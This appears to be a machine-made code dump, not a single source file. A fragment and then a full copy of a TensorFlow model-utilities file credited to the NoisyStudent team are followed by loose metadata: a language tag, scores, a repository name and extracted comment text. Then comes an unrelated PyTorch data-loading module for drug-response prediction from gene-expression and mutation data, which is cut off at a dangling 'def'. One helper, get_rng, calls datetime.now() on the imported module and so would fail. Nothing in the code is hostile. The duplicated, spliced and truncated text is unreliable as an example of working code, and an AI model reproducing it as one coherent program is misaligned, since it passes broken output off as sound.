if only_teacher_model: # only initialize the teacher model if 'teacher_model' not in ori_name: continue ckpt_name = ckpt_name[len('teacher_model/'):] if 'RMSProp' not in ckpt_name and 'ExponentialMovingAverage' not in ckpt_name: ckpt_name += '/ExponentialMovingAverage' graph_to_ckpt_map[ori_name] = ckpt_name assignment_map[ckpt_name] = var init_vars = tf.train.list_variables(init_checkpoint) initialized_variable = {} for x in init_vars: (name, var) = (x[0], x[1]) if name not in assignment_map: continue initialized_variable[name] = True new_assignment_map = {} for ckpt_name in assignment_map: if ckpt_name not in initialized_variable: block_name = ckpt_name.split('/')[1] assert False, ckpt_name + ' not found' else: new_assignment_map[ckpt_name] = assignment_map[ckpt_name] return new_assignment_map, graph_to_ckpt_map def construct_scalar_host_call( metric_dict, ): metric_names = list(metric_dict.keys()) def host_call_fn(gs, *args): gs = gs[0] # Host call fns are executed FLAGS.iterations_per_loop times after one # TPU loop is finished, setting max_queue value to the same as number of # iterations will make the summary writer only flush the data to storage # once per loop. with tf2.summary.create_file_writer( FLAGS.model_dir, max_queue=FLAGS.iterations_per_loop).as_default(): with tf2.summary.record_if(tf.math.equal(tf.math.floormod(gs, FLAGS.iterations_per_loop), 0)): for i, name in enumerate(metric_names): scalar = args[i][0] # with tf.contrib.summary.record_summaries_every_n_global_steps(100, gs): tf2.summary.scalar(name, scalar, step=gs) return tf.summary.all_v2_summary_ops() global_step_tensor = tf.reshape(tf.train.get_or_create_global_step(), [1]) other_tensors = [tf.reshape(metric_dict[key], [1]) for key in metric_names] host_call = (host_call_fn, [global_step_tensor] + other_tensors) return host_call def get_all_variable(): var_list = tf.trainable_variables() + tf.get_collection('moving_vars') for v in tf.global_variables(): # We maintain mva for batch norm moving mean and variance as well. if 'moving_mean' in v.name or 'moving_variance' in v.name: var_list.append(v) var_list = list(set(var_list)) var_list = sorted(var_list, key=lambda var: var.name) return var_list def init_from_ckpt(scaffold_fn): all_var_list = get_all_variable() all_var_list = sorted(all_var_list, key=lambda var: var.name) if FLAGS.teacher_model_name: init_ckpt = FLAGS.teacher_model_path else: init_ckpt = FLAGS.init_model_path assignment_map, graph_to_ckpt_map = get_assignment_map_from_checkpoint( all_var_list, init_ckpt, FLAGS.teacher_model_name is not None) if FLAGS.use_tpu: def tpu_scaffold(): tf.logging.info('initializing from {}'.format(init_ckpt)) tf.train.init_from_checkpoint(init_ckpt, assignment_map) return tf.train.Scaffold() scaffold_fn = tpu_scaffold else: tf.train.init_from_checkpoint(init_ckpt, assignment_map) tf.logging.info('**** Variables ****') for var in all_var_list: init_string = '' if var.name in graph_to_ckpt_map: init_string = ', *INIT_FROM_CKPT* <== {}'.format( graph_to_ckpt_map[var.name]) tf.logging.info(' name = %s, shape = %s%s', var.name, var.shape, init_string) return scaffold_fn
# coding=utf-8 # Copyright 2019 The Google NoisyStudent Team Authors. # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. '''Model utilities.''' from __future__ import absolute_import from __future__ import division from __future__ import print_function import six import json import re from absl import flags from PIL import Image import collections import os import functools import numpy as np import tensorflow as tf import tensorflow.compat.v2 as tf2 from tensorflow.python.tpu import tpu_function FLAGS = flags.FLAGS def build_learning_rate( initial_lr, global_step, steps_per_epoch=None, lr_decay_type='exponential', decay_factor=0.97, decay_epochs=2.4, total_steps=None, warmup_epochs=5, start_from_step=0, ): '''Build learning rate.''' lr_step = global_step + start_from_step if lr_decay_type == 'exponential': assert steps_per_epoch is not None decay_steps = steps_per_epoch * decay_epochs lr = tf.train.exponential_decay( initial_lr, lr_step, decay_steps, decay_factor, staircase=True) elif lr_decay_type == 'cosine': assert total_steps is not None lr = 0.5 * initial_lr * ( 1 + tf.cos(np.pi * tf.cast(lr_step, tf.float32) / total_steps)) elif lr_decay_type == 'constant': lr = initial_lr else: assert False, 'Unknown lr_decay_type : %s' % lr_decay_type if warmup_epochs: tf.logging.info('Learning rate warmup_epochs: %d' % warmup_epochs) warmup_steps = int(warmup_epochs * steps_per_epoch) warmup_lr = ( initial_lr * tf.cast(lr_step, tf.float32) / tf.cast( warmup_steps, tf.float32)) lr = tf.cond(lr_step < warmup_steps, lambda: warmup_lr, lambda: lr) return lr def build_optimizer(learning_rate, optimizer_name='rmsprop', decay=0.9, epsilon=0.001, momentum=0.9): '''Build optimizer.''' if optimizer_name == 'sgd': tf.logging.info('Using SGD optimizer') optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate) elif optimizer_name == 'momentum': tf.logging.info('Using Momentum optimizer') optimizer = tf.train.MomentumOptimizer( learning_rate=learning_rate, momentum=momentum) elif optimizer_name == 'rmsprop': tf.logging.info('Using RMSProp optimizer') optimizer = tf.train.RMSPropOptimizer(learning_rate, decay, momentum, epsilon) else: tf.logging.fatal('Unknown optimizer:', optimizer_name) return optimizer class TpuBatchNormalization(tf.layers.BatchNormalization): # class TpuBatchNormalization(tf.layers.BatchNormalization): '''Cross replica batch normalization.''' def __init__(self, fused=False, **kwargs): if fused in (True, None): raise ValueError('TpuBatchNormalization does not support fused=True.') super(TpuBatchNormalization, self).__init__(fused=fused, **kwargs) def _cross_replica_average(self, t, num_shards_per_group): '''Calculates the average value of input tensor across TPU replicas.''' num_shards = tpu_function.get_tpu_context().number_of_shards group_assignment = None if num_shards_per_group > 1: if num_shards % num_shards_per_group != 0: raise ValueError('num_shards: %d mod shards_per_group: %d, should be 0' % (num_shards, num_shards_per_group)) num_groups = num_shards // num_shards_per_group group_assignment = [[ x for x in range(num_shards) if x // num_shards_per_group == y ] for y in range(num_groups)] return tf.tpu.cross_replica_sum(t, group_assignment) / tf.cast( num_shards_per_group, t.dtype) else: tf.logging.info('TpuBatchNormalization None') return tf.tpu.cross_replica_sum(t, group_assignment) / tf.cast( num_shards, t.dtype) def _moments(self, inputs, reduction_axes, keep_dims): '''Compute the mean and variance: it overrides the original _moments.''' shard_mean, shard_variance = super(TpuBatchNormalization, self)._moments( inputs, reduction_axes, keep_dims=keep_dims) num_shards = tpu_function.get_tpu_context().number_of_shards or 1 if FLAGS.num_shards_per_group != -1: num_shards_per_group = FLAGS.num_shards_per_group else: if num_shards <= 8: # Skip cross_replica for 2x2 or smaller slices. num_shards_per_group = 1 else: num_shards_per_group = max(8, num_shards // 8) tf.logging.info('TpuBatchNormalization with num_shards_per_group %s', num_shards_per_group) if num_shards_per_group > 1 or num_shards_per_group == -2: # Compute variance using: Var[X]= E[X^2] - E[X]^2. shard_square_of_mean = tf.math.square(shard_mean) shard_mean_of_square = shard_variance + shard_square_of_mean group_mean = self._cross_replica_average( shard_mean, num_shards_per_group) group_mean_of_square = self._cross_replica_average( shard_mean_of_square, num_shards_per_group) group_variance = group_mean_of_square - tf.math.square(group_mean) return (group_mean, group_variance) else: return (shard_mean, shard_variance) def stochastic_depth(inputs, is_training, stochastic_depth_rate): '''Apply stochastic depth.''' if not is_training: return inputs # Compute keep_prob # TODO(tanmingxing): add support for training progress. keep_prob = 1.0 - stochastic_depth_rate # Compute stochastic_depth tensor batch_size = tf.shape(inputs)[0] random_tensor = keep_prob random_tensor += tf.random_uniform([batch_size, 1, 1, 1], dtype=inputs.dtype) binary_tensor = tf.floor(random_tensor) output = tf.div(inputs, keep_prob) * binary_tensor return output def archive_ckpt(ckpt_eval, ckpt_objective, ckpt_path): '''Archive a checkpoint if the metric is better.''' ckpt_dir, ckpt_name = os.path.split(ckpt_path) saved_objective_path = os.path.join(ckpt_dir, 'best_objective.txt') saved_objective = float('-inf') if tf.gfile.Exists(saved_objective_path): with tf.gfile.GFile(saved_objective_path, 'r') as f: saved_objective = float(f.read()) if saved_objective > ckpt_objective: tf.logging.info('Ckpt %s is worse than %s', ckpt_objective, saved_objective) return False filenames = tf.gfile.Glob(ckpt_path + '.*') if filenames is None: tf.logging.info('No files to copy for checkpoint %s', ckpt_path) return False # Clear the old folder. dst_dir = os.path.join(ckpt_dir, 'archive') if tf.gfile.Exists(dst_dir): tf.gfile.DeleteRecursively(dst_dir) tf.gfile.MakeDirs(dst_dir) # Write checkpoints. for f in filenames: dest = os.path.join(dst_dir, os.path.basename(f)) tf.gfile.Copy(f, dest, overwrite=True) ckpt_state = tf.train.generate_checkpoint_state_proto( dst_dir, model_checkpoint_path=ckpt_name, all_model_checkpoint_paths=[ckpt_name]) with tf.gfile.GFile(os.path.join(dst_dir, 'checkpoint'), 'w') as f: f.write(str(ckpt_state)) with tf.gfile.GFile(os.path.join(dst_dir, 'best_eval.txt'), 'w') as f: f.write('%s' % ckpt_eval) # Update the best objective. with tf.gfile.GFile(saved_objective_path, 'w') as f: f.write('%f' % ckpt_objective) tf.logging.info('Copying checkpoint %s to %s', ckpt_path, dst_dir) return True # TODO(hongkuny): Consolidate this as a common library cross models. class DepthwiseConv2D(tf.keras.layers.DepthwiseConv2D, tf.layers.Layer): '''Wrap keras DepthwiseConv2D to tf.layers.''' pass def save_pic(uint8_arr, filename, log=True): if log: tf.logging.info('saving {}'.format(filename)) img = Image.fromarray(uint8_arr) with tf.gfile.Open(filename, 'wb') as ouf: img.save(ouf, subsampling=0, quality=100) def int64_feature(value): '''Wrapper for inserting int64 features into Example proto.''' if not isinstance(value, list): value = [value] return tf.train.Feature(int64_list=tf.train.Int64List(value=value)) def float_feature(value): '''Wrapper for inserting float features into Example proto.''' if not isinstance(value, list): value = [value] return tf.train.Feature(float_list=tf.train.FloatList(value=value)) def bytes_feature(value): '''Wrapper for inserting bytes features into Example proto.''' if six.PY3 and isinstance(value, six.text_type): value = six.binary_type(value, encoding='utf-8') return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value])) class ImageCoder(object): '''Helper class that provides TensorFlow image coding utilities.''' def __init__(self): # Create a single Session to run all image coding calls. self._sess = tf.Session() # Initializes function that decodes RGB JPEG data. self._decode_jpeg_data = tf.placeholder(dtype=tf.string) self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3) self._encode_jpeg_data = tf.placeholder(dtype=tf.uint8) self._encode_jpeg = tf.image.encode_jpeg(self._encode_jpeg_data, format='rgb', quality=100) def encode_jpeg(self, image): image_data = self._sess.run(self._encode_jpeg, feed_dict={self._encode_jpeg_data: image}) return image_data def iterate_through_dataset(dst): iter = dst.make_initializable_iterator() elem = iter.get_next() cnt = 0 with tf.Session() as sess: sess.run(iter.initializer) try: while True: features = sess.run(elem) yield features except tf.errors.OutOfRangeError: pass def get_assignment_map_from_checkpoint(vars_list, init_checkpoint, only_teacher_model=False): graph_to_ckpt_map = {} assignment_map = {} for var in vars_list: ori_name = var.name ckpt_name = ori_name[:-len(':0')] if 'global_step' in ori_name: continue if only_teacher_model: # only initialize the teacher model if 'teacher_model' not in ori_name: continue ckpt_name = ckpt_name[len('teacher_model/'):] if 'RMSProp' not in ckpt_name and 'ExponentialMovingAverage' not in ckpt_name: ckpt_name += '/ExponentialMovingAverage' graph_to_ckpt_map[ori_name] = ckpt_name assignment_map[ckpt_name] = var init_vars = tf.train.list_variables(init_checkpoint) initialized_variable = {} for x in init_vars: (name, var) = (x[0], x[1]) if name not in assignment_map: continue initialized_variable[name] = True new_assignment_map = {} for ckpt_name in assignment_map: if ckpt_name not in initialized_variable: block_name = ckpt_name.split('/')[1] assert False, ckpt_name + ' not found' else: new_assignment_map[ckpt_name] = assignment_map[ckpt_name] return new_assignment_map, graph_to_ckpt_map def construct_scalar_host_call( metric_dict, ): metric_names = list(metric_dict.keys()) def host_call_fn(gs, *args): gs = gs[0] # Host call fns are executed FLAGS.iterations_per_loop times after one # TPU loop is finished, setting max_queue value to the same as number of # iterations will make the summary writer only flush the data to storage # once per loop. with tf2.summary.create_file_writer( FLAGS.model_dir, max_queue=FLAGS.iterations_per_loop).as_default(): with tf2.summary.record_if(tf.math.equal(tf.math.floormod(gs, FLAGS.iterations_per_loop), 0)): for i, name in enumerate(metric_names): scalar = args[i][0] # with tf.contrib.summary.record_summaries_every_n_global_steps(100, gs): tf2.summary.scalar(name, scalar, step=gs) return tf.summary.all_v2_summary_ops() global_step_tensor = tf.reshape(tf.train.get_or_create_global_step(), [1]) other_tensors = [tf.reshape(metric_dict[key], [1]) for key in metric_names] host_call = (host_call_fn, [global_step_tensor] + other_tensors) return host_call def get_all_variable(): var_list = tf.trainable_variables() + tf.get_collection('moving_vars') for v in tf.global_variables(): # We maintain mva for batch norm moving mean and variance as well. if 'moving_mean' in v.name or 'moving_variance' in v.name: var_list.append(v) var_list = list(set(var_list)) var_list = sorted(var_list, key=lambda var: var.name) return var_list def init_from_ckpt(scaffold_fn): all_var_list = get_all_variable() all_var_list = sorted(all_var_list, key=lambda var: var.name) if FLAGS.teacher_model_name: init_ckpt = FLAGS.teacher_model_path else: init_ckpt = FLAGS.init_model_path assignment_map, graph_to_ckpt_map = get_assignment_map_from_checkpoint( all_var_list, init_ckpt, FLAGS.teacher_model_name is not None) if FLAGS.use_tpu: def tpu_scaffold(): tf.logging.info('initializing from {}'.format(init_ckpt)) tf.train.init_from_checkpoint(init_ckpt, assignment_map) return tf.train.Scaffold() scaffold_fn = tpu_scaffold else: tf.train.init_from_checkpoint(init_ckpt, assignment_map) tf.logging.info('**** Variables ****') for var in all_var_list: init_string = '' if var.name in graph_to_ckpt_map: init_string = ', *INIT_FROM_CKPT* <== {}'.format( graph_to_ckpt_map[var.name]) tf.logging.info(' name = %s, shape = %s%s', var.name, var.shape, init_string) return scaffold_fn
en
0.805988
# coding=utf-8 # Copyright 2019 The Google NoisyStudent Team Authors. # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Model utilities. Build learning rate. Build optimizer. # class TpuBatchNormalization(tf.layers.BatchNormalization): Cross replica batch normalization. Calculates the average value of input tensor across TPU replicas. Compute the mean and variance: it overrides the original _moments. # Skip cross_replica for 2x2 or smaller slices. # Compute variance using: Var[X]= E[X^2] - E[X]^2. Apply stochastic depth. # Compute keep_prob # TODO(tanmingxing): add support for training progress. # Compute stochastic_depth tensor Archive a checkpoint if the metric is better. # Clear the old folder. # Write checkpoints. # Update the best objective. # TODO(hongkuny): Consolidate this as a common library cross models. Wrap keras DepthwiseConv2D to tf.layers. Wrapper for inserting int64 features into Example proto. Wrapper for inserting float features into Example proto. Wrapper for inserting bytes features into Example proto. Helper class that provides TensorFlow image coding utilities. # Create a single Session to run all image coding calls. # Initializes function that decodes RGB JPEG data. # only initialize the teacher model # Host call fns are executed FLAGS.iterations_per_loop times after one # TPU loop is finished, setting max_queue value to the same as number of # iterations will make the summary writer only flush the data to storage # once per loop. # with tf.contrib.summary.record_summaries_every_n_global_steps(100, gs): # We maintain mva for batch norm moving mean and variance as well.
2.098331
2
data.py
XieResearchGroup/CLEIT
0
6628979
<filename>data.py import os import datetime import numpy as np import random import pandas as pd import data_config import torch from torch.utils.data import TensorDataset, DataLoader from sklearn.model_selection import train_test_split, StratifiedKFold _RNG_SEED = None DRUG_DICT = { 'gem': 'gemcitabine', 'ava': 'avagacestat', } def get_rng(obj=None): """ This function is copied from `tensorpack <https://github.com/ppwwyyxx/tensorpack/blob/master/tensorpack/utils/utils.py>`__. Get a good RNG seeded with time, pid and the object. Args: obj: some object to use to generate random seed. Returns: np.random.RandomState: the RNG. """ seed = (id(obj) + os.getpid() + int(datetime.now().strftime("%Y%m%d%H%M%S%f"))) % 4294967295 if _RNG_SEED is not None: seed = _RNG_SEED return random.Random(seed) class DataProvider: def __init__(self, batch_size=64, target='AUC', random_seed=2019): self.seed = random_seed self.target = target self.batch_size = batch_size self._load_gex_data() self._load_mut_data() self._load_target_data() self.shape_dict = {'gex': self.gex_dat.shape[-1], 'mut': self.mut_dat.shape[-1], 'target': self.target_df.shape[-1]} def _load_gex_data(self): self.gex_dat = pd.read_csv(data_config.gex_feature_file, index_col=0) # ccle_sample_info_df = pd.read_csv(data_config.ccle_sample_file, index_col=0) # with gzip.open(data_config.xena_sample_file) as f: # xena_sample_info_df = pd.read_csv(f, sep='\t', index_col=0) # xena_samples = xena_sample_info_df.index.intersection(self.gex_dat.index) # ccle_samples = self.gex_dat.index.difference(xena_samples) # xena_sample_info_df = xena_sample_info_df.loc[xena_samples] # ccle_sample_info_df = ccle_sample_info_df.loc[ccle_samples.intersection(ccle_sample_info_df.index)] # self.xena_gex_df = self.gex_dat.loc[xena_samples] # self.mut_gex_df = self.gex_dat.loc[ccle_samples] def _load_mut_data(self): self.xena_mut_dat = pd.read_csv(data_config.xena_mut_uq_file, index_col=0) self.ccle_mut_dat = pd.read_csv(data_config.ccle_mut_uq_file, index_col=0) self.mut_dat = self.xena_mut_dat.append(self.ccle_mut_dat) def _load_target_data(self): # gdsc1_response = pd.read_csv(data_config.gdsc_target_file1) # gdsc2_response = pd.read_csv(data_config.gdsc_target_file2) # gdsc1_sensitivity_df = gdsc1_response[['COSMIC_ID', 'DRUG_NAME', self.target]] # gdsc2_sensitivity_df = gdsc2_response[['COSMIC_ID', 'DRUG_NAME', self.target]] # gdsc1_sensitivity_df.loc[:, 'DRUG_NAME'] = gdsc1_sensitivity_df['DRUG_NAME'].str.lower() # gdsc2_sensitivity_df.loc[:, 'DRUG_NAME'] = gdsc2_sensitivity_df['DRUG_NAME'].str.lower() # # if self.target == 'LN_IC50': # gdsc1_sensitivity_df.loc[:, self.target] = np.exp(gdsc1_sensitivity_df[self.target]) # gdsc2_sensitivity_df.loc[:, self.target] = np.exp(gdsc2_sensitivity_df[self.target]) # # gdsc1_target_df = gdsc1_sensitivity_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() # gdsc2_target_df = gdsc2_sensitivity_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() # gdsc1_target_df = gdsc1_target_df.loc[gdsc1_target_df.index.difference(gdsc2_target_df.index)] # gdsc_target_df = pd.concat([gdsc1_target_df, gdsc2_target_df]) target = self.target.lower() gdsc_target_df = pd.read_csv(data_config.gdsc_target_file) gdsc_target_df = gdsc_target_df[['COSMIC_ID', 'DRUG_NAME', target]] gdsc_target_df.dropna(subset=[target], inplace=True) gdsc_target_df = gdsc_target_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() target_df = gdsc_target_df.reset_index().pivot_table(values=target, index='COSMIC_ID', columns='DRUG_NAME') ccle_sample_info = pd.read_csv(data_config.ccle_sample_file, index_col=4) ccle_sample_info = ccle_sample_info.loc[ccle_sample_info.index.dropna()] ccle_sample_info.index = ccle_sample_info.index.astype('int') gdsc_sample_info = pd.read_csv(data_config.gdsc_sample_file, header=0, index_col=1) gdsc_sample_info = gdsc_sample_info.loc[gdsc_sample_info.index.dropna()] gdsc_sample_info.index = gdsc_sample_info.index.astype('int') gdsc_sample_mapping = gdsc_sample_info.merge(ccle_sample_info, left_index=True, right_index=True, how='inner')[ ['DepMap_ID']] gdsc_sample_mapping_dict = gdsc_sample_mapping.to_dict()['DepMap_ID'] target_df.index = target_df.index.map(gdsc_sample_mapping_dict) target_df = target_df.loc[target_df.index.dropna()] gex_labeled_samples = self.gex_dat.index.intersection(target_df.index) target_df.drop(columns=target_df.columns[ target_df.loc[gex_labeled_samples].isna().sum() / len(gex_labeled_samples) >= 0.1], inplace=True) self.target_df = target_df def get_unlabeled_gex_dataloader(self): gex_dataset = TensorDataset(torch.from_numpy(self.gex_dat.values.astype('float32'))) unlabeled_gex_dataloader = DataLoader(gex_dataset, batch_size=self.batch_size, shuffle=True) return unlabeled_gex_dataloader def get_labeled_data_generator(self, omics='mut'): labeled_samples = self.gex_dat.index.intersection(self.target_df.index) labeled_samples = self.ccle_mut_dat.index.intersection(labeled_samples) labeled_target_df = self.target_df.loc[labeled_samples] labeled_samples = labeled_samples[labeled_target_df.shape[1] - labeled_target_df.isna().sum(axis=1) >= 2] labeled_target_df = self.target_df.loc[labeled_samples] mut_only_labeled_samples = self.mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_only_labeled_samples.difference(labeled_samples) mut_only_labeled_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_labeled_target_df.shape[1] - mut_only_labeled_target_df.isna().sum(axis=1) >= 2] mut_only_labeled_target_df = self.target_df.loc[mut_only_labeled_samples] labeled_drug_mut_only_dataset = TensorDataset( torch.from_numpy(self.ccle_mut_dat.loc[mut_only_labeled_samples].values.astype('float32')), torch.from_numpy(mut_only_labeled_target_df.values.astype('float32')) ) labeled_drug_mut_only_dataloader = DataLoader(labeled_drug_mut_only_dataset, batch_size=self.batch_size, shuffle=True) sample_label_vec = ( labeled_target_df.isna().sum(axis=1) <= labeled_target_df.isna().sum(axis=1).median()).astype('int') s_kfold = StratifiedKFold(n_splits=5, random_state=self.seed, shuffle=True) if omics == 'gex': for train_index, test_index in s_kfold.split(self.gex_dat.loc[labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.gex_dat.loc[labeled_samples].values[train_index], \ self.gex_dat.loc[labeled_samples].values[test_index] train_labels, test_labels = labeled_target_df.values[train_index].astype('float32'), \ labeled_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True, drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) yield train_labeled_dataloader, test_labeled_dataloader else: for train_index, test_index in s_kfold.split(self.ccle_mut_dat.loc[labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.ccle_mut_dat.loc[labeled_samples].values[train_index], \ self.ccle_mut_dat.loc[labeled_samples].values[test_index] train_labels, test_labels = labeled_target_df.values[train_index].astype('float32'), \ labeled_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True, drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) yield train_labeled_dataloader, test_labeled_dataloader, labeled_drug_mut_only_dataloader def get_labeled_gex_dataloader(self): gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) gex_target_df = self.target_df.loc[gex_labeled_samples] gex_labeled_samples = gex_labeled_samples[gex_target_df.shape[1] - gex_target_df.isna().sum(axis=1) >= 2] gex_target_df = self.target_df.loc[gex_labeled_samples] labeled_gex_dataset = TensorDataset( torch.from_numpy(self.gex_dat.loc[gex_labeled_samples].values.astype('float32')), torch.from_numpy(gex_target_df.values.astype('float32')) ) labeled_gex_dataloader = DataLoader(labeled_gex_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) return labeled_gex_dataloader def get_labeled_mut_dataloader(self): gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) mut_labeled_samples = self.ccle_mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_labeled_samples.difference(gex_labeled_samples) mut_labeled_samples = mut_labeled_samples.difference(mut_only_labeled_samples) mut_target_df = self.target_df.loc[mut_labeled_samples] mut_labeled_samples = mut_labeled_samples[mut_target_df.shape[1] - mut_target_df.isna().sum(axis=1) >= 2] mut_target_df = self.target_df.loc[mut_labeled_samples] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_target_df.shape[1] - mut_only_target_df.isna().sum(axis=1) >= 2] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] labeled_mut_dataset = TensorDataset( torch.from_numpy(self.ccle_mut_dat.loc[mut_labeled_samples].values.astype('float32')), torch.from_numpy(mut_target_df.values.astype('float32')) ) labeled_mut_dataloader = DataLoader(labeled_mut_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) labeled_drug_mut_only_dataset = TensorDataset( torch.from_numpy(self.ccle_mut_dat.loc[mut_only_labeled_samples].values.astype('float32')), torch.from_numpy(mut_only_target_df.values.astype('float32')) ) labeled_drug_mut_only_dataloader = DataLoader(labeled_drug_mut_only_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) return labeled_mut_dataloader, labeled_drug_mut_only_dataloader def get_drug_labeled_gex_dataloader(self, drug=None, ft_flag=True): # drug = DRUG_DICT[drug] # drug_target_df = self.target_df[drug] # drug_target_df.dropna(inplace=True) # drug_gex_labeled_samples = self.gex_dat.index.intersection(drug_target_df.index) # # get gex dataset and dataloader # drug_gex_target_df = drug_target_df.loc[drug_gex_labeled_samples] # gex_label_vec = (drug_gex_target_df < np.median(drug_gex_target_df)).astype('int') gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) gex_target_df = self.target_df.loc[gex_labeled_samples] gex_labeled_samples = gex_labeled_samples[gex_target_df.shape[1] - gex_target_df.isna().sum(axis=1) >= 2] gex_target_df = self.target_df.loc[gex_labeled_samples] sample_label_vec = (gex_target_df.isna().sum(axis=1) <= gex_target_df.isna().sum(axis=1).median()).astype('int') if not ft_flag: pass else: s_kfold = StratifiedKFold(n_splits=5, random_state=self.seed, shuffle=True) for train_index, test_index in s_kfold.split(self.gex_dat.loc[gex_labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.gex_dat.loc[gex_labeled_samples].values[train_index], \ self.gex_dat.loc[gex_labeled_samples].values[test_index] train_labels, test_labels = gex_target_df.values[train_index].astype('float32'), gex_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True,drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) yield train_labeled_dataloader, test_labeled_dataloader def get_drug_labeled_mut_dataloader(self, drug=None, ft_flag=True): # drug = DRUG_DICT[drug] # drug_target_df = self.target_df[drug] # drug_target_df.dropna(inplace=True) # drug_gex_labeled_samples = self.gex_dat.index.intersection(drug_target_df.index) # drug_mut_labeled_samples = self.ccle_mut_dat.index.intersection(drug_target_df.index) # drug_mut_only_labeled_samples = drug_mut_labeled_samples.difference(drug_gex_labeled_samples) # drug_mut_labeled_samples = drug_mut_labeled_samples.difference(drug_mut_only_labeled_samples) # # drug_mut_target_df = drug_target_df.loc[drug_mut_labeled_samples] # mut_label_vec = (drug_mut_target_df < np.median(drug_mut_target_df)).astype('int') gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) mut_labeled_samples = self.ccle_mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_labeled_samples.difference(gex_labeled_samples) mut_labeled_samples = mut_labeled_samples.difference(mut_only_labeled_samples) mut_target_df = self.target_df.loc[mut_labeled_samples] mut_labeled_samples = mut_labeled_samples[mut_target_df.shape[1] - mut_target_df.isna().sum(axis=1) >= 2] mut_target_df = self.target_df.loc[mut_labeled_samples] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_target_df.shape[1] - mut_only_target_df.isna().sum(axis=1) >= 2] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] sample_label_vec = (mut_target_df.isna().sum(axis=1) <= mut_target_df.isna().sum(axis=1).median()).astype('int') labeled_drug_mut_only_dataset = TensorDataset( torch.from_numpy(self.ccle_mut_dat.loc[mut_only_labeled_samples].values.astype('float32')), torch.from_numpy(mut_only_target_df.values.astype('float32')) ) labeled_drug_mut_only_dataloader = DataLoader(labeled_drug_mut_only_dataset, batch_size=self.batch_size, shuffle=True) if not ft_flag: pass # labeled_mut_dataset = TensorDataset( # torch.from_numpy(self.ccle_mut_dat.loc[drug_mut_labeled_samples].values.astype('float32')), # torch.from_numpy(drug_mut_target_df.values.astype('float32')) # ) # labeled_mut_dataloader = DataLoader(labeled_mut_dataset, # batch_size=self.batch_size, # shuffle=True) # return labeled_mut_dataloader, labeled_drug_mut_only_dataloader else: s_kfold = StratifiedKFold(n_splits=5, random_state=self.seed, shuffle=True) for train_index, test_index in s_kfold.split(self.ccle_mut_dat.loc[mut_labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.ccle_mut_dat.loc[mut_labeled_samples].values[train_index], \ self.ccle_mut_dat.loc[mut_labeled_samples].values[test_index] train_labels, test_labels = mut_target_df.values[train_index].astype('float32'), mut_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True, drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) yield train_labeled_dataloader, test_labeled_dataloader, labeled_drug_mut_only_dataloader def 